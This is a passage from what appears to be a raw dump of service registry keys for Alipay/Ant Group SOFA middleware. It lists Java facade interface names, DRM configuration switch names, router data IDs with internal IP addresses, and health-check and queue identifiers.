IRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.watchlist.WatchlistReadingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkloandecision.service.facade.agds.CreditQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdsriskdecision.facade.BuyerSellerLmtClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.excptsis.DrilldownAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:adc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.cifQueryAccountNoSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.wealthdecisionsys.facade.AlarmRobotSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.ActivityDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.core.service.factor.FactorInvokeOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.QuestionTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finopenscene.facade.fundanalysis.facade.FundAnalysisLiveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.biz.service.webspi.controller.KbItemManageWrapperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.SubAccountQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:autoTransferExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.173.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.gffintrade.common.service.facade.api.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.149.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:secudownloadAntProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.declareReplacedPids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.goldetfprod.common.service.facade.goods.api.ExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.alipay.api.rzone.query.ZlcArgInstructionQueryRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.shop.ShopInfoWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.211.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopprod.common.service.allin.facade.KbGroupApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finrtcalcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.insusercenter.facade.customer.InsCustomerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.message.InstMessageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.service.BaselineCalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.DebitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.recruit.RecruitApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbocenter.common.service.facade.order.SpecialPaymentManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.testVelocityProcessType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.CaseRunningCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.ServiceMetaValidateFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_playTemplateProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.mock.OutSyncTransCallBackForLdcMock:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.JobFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.ide.common.facade.tenant.spi.TenantInitSpi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_ACCTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finscenemng.common.service.facade.api.BrmGroupMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoadprod.common.service.AdvertisementPlaceManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finstore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chair-script:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acnotifycore.common.service.facade.StationMsgCategoryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmac_ProcessDiscardCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:paycoreDataLoadDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterLegalUserGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.trans.api.DishonorDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@astar#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alibaba.alsc.merchantprod.integration.mif.MerchantClassificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.mng.api.ComponentImplMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.drmdemos:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:finishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.application.v2.ApplicationPackingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.channel.ExternalChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inslifeprod.common.facade.insure.InsureRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC-acctrans-SendAccountLogMsg_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilerelationtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-cssupporttwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.statistics.StatisticsInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.delivery.DeliveryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.44.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_RISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.core.service.InspectSubtaskDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dtbank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.BizInferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintranscore.common.service.facade.trans.FinTransOrderQueryFacade:1.0:fundtranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoscene.facade.sceneone.api.SceneOneSocialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:ccrprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscvprod.common.service.facade.InsImageRecognizeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryDailyBalanceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dchaincustomer.facade.api.absuser.AbsUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tscenter.common.service.facade.EdgePubFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuntu.facade.trace.AuditGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.filefactory.platform.FileFactoryConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.VerifyIdentifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=midas.aghanimplus.MidasLoadTestDRMControl.dataRefreshInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:finscbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfcenter.common.service.facade.AccountMapRuleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","amldataproc@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_DCEPTRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:tsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmerchantrisk.common.service.facade.merchant.MerchantVerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.minitemplatemsg.MiniTemplateMsgSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.taskcenter.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.openapi.PipelineOpenApi:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cif:name=com.alipay.cif.client.drm.AntPassportSwitcher.shadowReadFromAntPassportRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.core.engine.front.service.stub.MDataConsumeStubService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:edge_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.label.api.BizLabelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_script_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.OrderGovFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kgopen.common.sdk.open.service.schema.OntologyRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue11#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_auditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.charge_chargeThinDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.233.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:linkc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kacrm.industry.IndustryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.core.service.withdraw.WithdrawService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventRelatedEntityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.facade.PrizeDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_DISTRIBUTE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprod.common.service.facade.UserSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsroalipay.facade.setting.GeneralSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.config.MobileCodecConfigureOperationlogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.RuntimeNodeServerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yfd.common.service.facade.dm.DomainModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.54.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ropcn.common.service.facade.api.cscheck.CsCheckFactorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.FinormExpressEngineDebugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.drm.FacadeCacheConfigDRM.openFacadeCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-testyunxukoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbdishAndSkuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.seal.SealManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetkeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.arcore.common.service.facade.ArrangementCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frastress.common.service.facade.api.entityrelation.RiskPlatformEntityRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.TenantInterfaceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.SpiConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:pcpcReachConfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:checkroute_async@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.LeadsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.config.ZcbConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.224.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanApplyCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aldata.common.service.facade.api.OrgInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.holoxCheckAudioQps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.metadata.common.service.rest.ram.RestRoleService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.displayDataBoard,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.cacheMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.cschat.common.service.facade.api.ChcServerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.agreement.AgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.96.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.213.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BKGUARPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.groupCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.accountChangeMsgSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.service.facade.RcHgIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.PageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcbmarketcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.102.210.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:instinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:test_import_export@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.SettleBatchFacade:1.0:settleBatchFacadeRemote@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.WorkOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.FreezeReceiptService:1.0:nevermore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundprod.common.service.facade.api.CreateAndPayQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antaid.common.service.facade.api.AntaidEventFacade:1.0:antaid_event_facade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.oneUserIdOneRecord,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.25.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.30.211.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.buc.api.ApplyInstanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.acctransquery.common.service.facade.api.AccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inspricecore.common.service.facade.InsPriceCoreProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iecpprod.common.service.facade.api.PayOptionConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finallocation.common.service.facade.api.AllocationTrialConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.prodmng.facade.techtool.ProdMngTechToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acspcore.common.service.InstanceQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:zmCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebquery.common.facade.service.YebDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.ProtocolVerifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsLifeMessageApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:hyp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_IACCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.217.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instasset.common.service.integration.masterdata.result.code.ExchangeCodeSortConfigQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundAdvanceDepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.ScriptConfMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.251.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alphad.common.service.facade.proxy.api.IProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.alert.analysis.HaAlertAnalysisManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.SimpleOrderOperateService:1.0:ordermng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.instradeprod.common.service.InsApplicationAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.etetestcore.service.api.mordercenter.MocQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.77.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fraudmng.common.service.facade.redblue.api.PunishStrategyManageRevertService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.yfxInHistory,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dk.common.service.facade.open.api.rule.DmonitorRuleCurdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.TaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodmngcore.facade.ProdHomePageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.workflow.PresKaDingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.activity.ActivityInfoManagerS